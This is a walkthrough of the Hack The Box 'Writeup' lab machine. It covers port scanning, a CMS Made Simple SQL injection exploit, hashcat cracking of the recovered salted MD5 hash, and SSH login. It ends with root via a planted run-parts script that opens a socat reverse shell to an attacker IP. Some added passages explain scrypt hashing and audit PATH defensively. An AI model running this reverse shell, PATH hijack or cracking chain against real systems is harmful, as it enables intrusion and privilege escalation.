HTB Writeup

$ nmap -A -T4 -p- -sV 10.10.10.138

Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-16 21:59 CEST
Nmap scan report for 10.10.10.138
Host is up (0.042s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE    VERSION
22/tcp open  ssh        OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.74 seconds

Although nmap reports port 80 as open, it also labels the service as tcpwrapped.
What does that mean?

Tcpwrapped refers to tcpwrapper, a host-based network access control program on Unix and Linux.

When Nmap labels something tcpwrapped, it means that the behavior of the port is consistent with one that is protected by tcpwrapper.

Specifically, it means that a full TCP handshake was completed, but the remote host closed the connection without receiving any data.
It is important to note that tcpwrapper protects programs, not ports.

This means that a valid (not false-positive) tcpwrapped response indicates a real network service is available, but you are not on the list of hosts allowed to talk with it.

When a very large number of ports are shown as tcpwrapped, it is unlikely that they represent real services, so the behaviour probably means something else like a load balancer or firewall is intercepting the connection requests.

https://secwiki.org/w/FAQ_tcpwrapped

Access to http://10.10.10.138

Eeyore DoS protection script?

We’ve found this page.

http://10.10.10.138/writeup/

According to this data,

GET http://10.10.10.138/writeup/index.php?page=writeup HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
Referer: http://10.10.10.138/writeup/
Host: 10.10.10.138
Cookie: CMSSESSID9d372ef93962=c5esgjkeaerfa215rs0119gat7

There is a Cookie called: CMSSESSID9d372ef93962

We could use wpscan to try to guess which CMS we are targeting, but in this case it is just as easy to check the source code of the web page.

http://www.cmsmadesimple.org/
CMS Made simple

<meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All rights reserved." />

On Google: CMS Made simple 2019

https://www.exploit-db.com/exploits/46635

$ python3 46635.py --url http://10.10.10.138/writeup/ --wordlist /usr/share/wordlists/rockyou.txt

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7

According to the script's code, the password it returns is stored as an MD5 hash, so hashcat can be used to crack it.

To do that we also need the salt that was found alongside the password, because the scheme is md5($salt.$pass) (hashcat mode 20).

$ echo "62def4866937f08cc13bab43bb14e6f7:5a599ef579066807" > hash
$ hashcat -a 0 -m 20 hash /usr/share/wordlists/rockyou.txt

hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-5557U CPU @ 3.10GHz, 4376/4440 MB (2048 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimim salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 64 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 2 secs

62def4866937f08cc13bab43bb14e6f7:5a599ef579066807:raykayjay9
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: md5($salt.$pass)
Hash.Target......: 62def4866937f08cc13bab43bb14e6f7:5a599ef579066807
Time.Started.....: Sat Oct 17 17:22:23 2020 (8 secs)
Time.Estimated...: Sat Oct 17 17:22:31 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   577.3 kH/s (1.29ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 4360192/14344385 (30.40%)
Rejected.........: 0/4360192 (0.00%)
Restore.Point....: 4358144/14344385 (30.38%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: raynerleow -> raygan96

Started: Sat Oct 17 17:21:19 2020
Stopped: Sat Oct 17 17:22:32 2020

Password is: raykayjay9

So we have obtained user and password.
jkr:raykayjay9
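To make clear why the dictionary run above finishes in seconds, here is an added example (not code from the writeup, from the exploit script or from CMS Made Simple) that reproduces the md5($salt.$pass) scheme hashcat mode 20 stands for, checks the salt and digest from the writeup against a constructed four-word list, and times it against scrypt, the kind of memory-hard KDF a CMS should store passwords with instead. The salt and digest are the ones printed by the exploit above; the wordlist, the scrypt parameters and the helper names are assumptions of this example.

```python
"""Added example, not code from the writeup or from CMS Made Simple: the
legacy md5($salt.$pass) scheme (hashcat -m 20) next to a slow KDF (scrypt),
to show why one is crackable in seconds and the other is not.
"""
import hashlib
import hmac
import os
import time
from typing import Iterable, Optional

# Values taken from the writeup's exploit output and hashcat result.
PAGE_SALT = "5a599ef579066807"
PAGE_DIGEST = "62def4866937f08cc13bab43bb14e6f7"

# Constructed miniature wordlist; the real run used rockyou.txt.
SAMPLE_WORDLIST = ["password", "raynerleow", "raykayjay9", "raygan96"]


def legacy_hash(salt: str, password: str) -> str:
    """md5(salt + password) as lowercase hex: the md5($salt.$pass) layout."""
    return hashlib.md5((salt + password).encode("utf-8")).hexdigest()


def legacy_verify(digest: str, salt: str, password: str) -> bool:
    """Constant-time comparison of a candidate against a stored digest."""
    return hmac.compare_digest(legacy_hash(salt, password), digest.lower())


def dictionary_check(digest: str, salt: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose md5(salt+candidate) equals digest.

    One unkeyed MD5 per guess is the whole cost an attacker pays: the salt
    only defeats precomputed tables, it does not slow down per-hash guessing.
    """
    for candidate in candidates:
        if legacy_verify(digest, salt, candidate):
            return candidate
    return None


def scrypt_hash(password: str, salt: bytes, n: int = 2 ** 14, r: int = 8, p: int = 1) -> bytes:
    """Memory-hard KDF: each guess costs about 16 MiB of RAM and tens of ms of CPU."""
    return hashlib.scrypt(password.encode("utf-8"), salt=salt, n=n, r=r, p=p, dklen=32)


def scrypt_verify(stored: bytes, password: str, salt: bytes) -> bool:
    """Constant-time check of a password against a stored scrypt output."""
    return hmac.compare_digest(scrypt_hash(password, salt), stored)


def guesses_per_second(check, seconds: float = 0.3) -> float:
    """Call check() repeatedly for roughly `seconds` and return the achieved rate."""
    count = 0
    start = time.perf_counter()
    while time.perf_counter() - start < seconds:
        check()
        count += 1
    return count / (time.perf_counter() - start)


def slowdown_factor() -> float:
    """How many times fewer guesses per second scrypt allows than md5(salt.pass)."""
    salt = os.urandom(16)
    fast = guesses_per_second(lambda: legacy_verify(PAGE_DIGEST, PAGE_SALT, "wrong"))
    slow = guesses_per_second(lambda: scrypt_verify(b"\x00" * 32, "wrong", salt))
    return fast / slow


if __name__ == "__main__":
    print("cracked:", dictionary_check(PAGE_DIGEST, PAGE_SALT, SAMPLE_WORDLIST))
    print(f"scrypt is about {slowdown_factor():,.0f}x slower per guess than md5(salt.pass)")
```

Run it directly to see the page's digest resolve to raykayjay9 from the four-word list and to get a local measurement of how much slower per guess scrypt is on your CPU; the exact ratio varies by machine, but it is orders of magnitude, which is what turns a 30% pass of rockyou.txt from eight seconds into days.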

$ ssh jkr@10.10.10.138

The authenticity of host '10.10.10.138 (10.10.10.138)' can't be established.
ECDSA key fingerprint is SHA256:TEw8ogmentaVUz08dLoHLKmD7USL1uIqidsdoX77oy0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.138' (ECDSA) to the list of known hosts.
jkr@10.10.10.138's password: 
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jkr@writeup:~$

jkr@writeup:~$ ls

user.txt

jkr@writeup:~$ cat user.txt

d4e4XXXXXXXXXXXXXXXXXXXXXXXXXXXX

Run Linpeas:

jkr@writeup:~$ wget http://10.10.14.25:8080/linpeas.sh

--2020-10-17 15:56:38--  http://10.10.14.25:8080/linpeas.sh
Connecting to 10.10.14.25:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 293431 (287K) [text/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh                            100%[=======================================================================>] 286.55K   579KB/s    in 0.5s    

2020-10-17 15:56:39 (579 KB/s) - ‘linpeas.sh’ saved [293431/293431]

jkr@writeup:~$ chmod +x linpeas.sh
jkr@writeup:~$ ./linpeas.sh

Starting linpeas. Caching Writable Folders...
...

Analyzing the results, we see that user jkr also belongs to the group staff.

...
[+] All users & groups
uid=0(root) gid=0(root) groups=0(root)                                                                                                                
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)
uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup)
...

It is not a default group.
https://wiki.debian.org/SystemGroups

staff: Allows users to add local modifications to the system (/usr/local) without needing root privileges (note that executables in /usr/local/bin are in the PATH variable of any user, and they may «override» the executables in /bin and /usr/bin with the same name). Compare with group «adm», which is more related to monitoring/security.

The directories writable by group staff are:

[+] Interesting GROUP writable files (not in Home) (max 500)
...
/var/local                      
/usr/local
/usr/local/bin
/usr/local/include
/usr/local/share
/usr/local/share/sgml
/usr/local/share/sgml/misc
/usr/local/share/sgml/stylesheet
/usr/local/share/sgml/entities
/usr/local/share/sgml/dtd
/usr/local/share/sgml/declaration
/usr/local/share/fonts
/usr/local/share/man
/usr/local/share/emacs
/usr/local/share/emacs/site-lisp
/usr/local/share/xml
/usr/local/share/xml/schema
/usr/local/share/xml/misc
/usr/local/share/xml/entities
/usr/local/share/xml/declaration
/usr/local/games
/usr/local/src
/usr/local/etc
/usr/local/lib
/usr/local/lib/python3.5
/usr/local/lib/python3.5/dist-packages
/usr/local/lib/python2.7
/usr/local/lib/python2.7/dist-packages
/usr/local/lib/python2.7/site-packages
/usr/local/sbin
...

Looking at the PATH variable,

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

/usr/local/bin is searched before /bin and /usr/bin.

Now let’s run pspy:

jkr@writeup:~$ wget http://10.10.14.25:8080/pspy64

--2020-10-17 16:51:47--  http://10.10.14.25:8080/pspy64
Connecting to 10.10.14.25:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64                                100%[=======================================================================>]   2.94M  6.53MB/s    in 0.4s    

2020-10-17 16:51:48 (6.53 MB/s) - ‘pspy64’ saved [3078592/3078592]

https://github.com/DominicBreuker/pspy

pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute.

2020/10/17 17:06:01 CMD: UID=0    PID=17592  | /bin/sh -c /root/bin/cleanup.pl >/dev/null 2>&1
2020/10/17 17:06:19 CMD: UID=0    PID=17593  | sshd: jkr [priv]  
2020/10/17 17:06:19 CMD: UID=0    PID=17594  | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new                                                    
2020/10/17 17:06:19 CMD: UID=0    PID=17595  | run-parts --lsbsysinit /etc/update-motd.d 
2020/10/17 17:06:19 CMD: UID=0    PID=17596  | /bin/sh /etc/update-motd.d/10-uname 
2020/10/17 17:06:19 CMD: UID=0    PID=17597  | sshd: jkr [priv]  
2020/10/17 17:06:19 CMD: UID=1000 PID=17598  | sshd: jkr@pts/1   
2020/10/17 17:06:19 CMD: UID=1000 PID=17600  | -bash

When we log in through another ssh connection as jkr, sshd (running as root) regenerates the message of the day, and run-parts is invoked by its bare name rather than by an absolute path.

This matters because that is exactly when the PATH variable comes into play.
When a command is called with an absolute path, PATH is not consulted: the system already knows where the binary is.

When only the command name is given, the system walks PATH in order and runs the first matching executable it finds. The environment set by env -i above puts /usr/local/bin, which is writable by group staff, ahead of the system directories.

So if we place our own run-parts in /usr/local/bin, it will be executed as root the next time an ssh connection is opened.
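The same PATH walk can be checked from the defender's side. The following POSIX sh script is an added example, not part of the original writeup or of pspy: given a PATH string it reports entries that the current user can write to and that are searched before the system directories, shows in which directory a bare command name such as run-parts would resolve, and lists executables in those early directories that shadow a system command. The function names are this example's own; the directories it inspects come from whatever PATH you pass in.

```sh
#!/bin/sh
# Added example, not part of the original writeup: audit a PATH string the
# way a defender would after reading the pspy output above. It reports PATH
# entries the current user can write to that are searched before the system
# directories, shows where a bare command name resolves, and lists
# executables in those early directories that shadow a system command.

SYSTEM_DIRS="/bin /usr/bin /sbin /usr/sbin"

# Print each PATH entry on its own line.
split_path() {
    printf '%s\n' "$1" | tr ':' '\n'
}

# Print PATH entries writable by the current user that precede the first
# system directory. A directory like /usr/local/bin that is writable by
# group staff (as on this box) shows up here for any member of that group.
writable_before_system() {
    split_path "$1" | while IFS= read -r dir; do
        if [ -z "$dir" ]; then
            continue
        fi
        case " $SYSTEM_DIRS " in *" $dir "*) break ;; esac
        if [ -d "$dir" ] && [ -w "$dir" ]; then
            printf '%s\n' "$dir"
        fi
    done
}

# Print the directory in which a bare command name resolves first, i.e. what
# a shell, cron job or sshd hook that calls "run-parts" would actually run.
resolve_first() {
    name="$1"
    split_path "$2" | while IFS= read -r dir; do
        if [ -n "$dir" ] && [ -x "$dir/$name" ]; then
            printf '%s\n' "$dir"
            break
        fi
    done
}

# For every writable early directory, list executables whose name also
# exists in a system directory: each one silently replaces that command.
shadowed_commands() {
    writable_before_system "$1" | while IFS= read -r dir; do
        for f in "$dir"/*; do
            if [ -f "$f" ] && [ -x "$f" ]; then
                name=${f##*/}
                for sys in $SYSTEM_DIRS; do
                    if [ -x "$sys/$name" ]; then
                        printf '%s shadows %s/%s\n' "$f" "$sys" "$name"
                        break
                    fi
                done
            fi
        done
    done
}

# When run directly, audit the caller's own PATH.
echo "Writable PATH entries searched before the system directories:"
writable_before_system "$PATH"
echo "Commands shadowed from those entries:"
shadowed_commands "$PATH"
```

Running it as a member of group staff on a box like this one would list /usr/local/sbin and /usr/local/bin as writable early entries; run as root with the PATH shown in the env -i line, it lists the same directories, which is the finding that matters, since root is the one executing whatever lands there. The fixes are the usual ones: call helpers by absolute path in privileged hooks, keep /usr/local/bin out of root's PATH or stop making it group-writable, and alert on new executables appearing in it.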

Let’s create our own «nice» run-parts command:

jkr@writeup:/tmp$ nano run-parts

#!/bin/bash
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.7:4242

jkr@writeup:/tmp$ chmod +x run-parts
jkr@writeup:/tmp$ cp run-parts /usr/local/bin/
$ ssh jkr@10.10.10.138

jkr@10.10.10.138's password:

$ socat file:tty,raw,echo=0 TCP-L:4242

root@writeup:/#

root@writeup:/# whoami

root

root@writeup:/# cat /root/root.txt

eebaXXXXXXXXXXXXXXXXXXXXXXXXXXXX
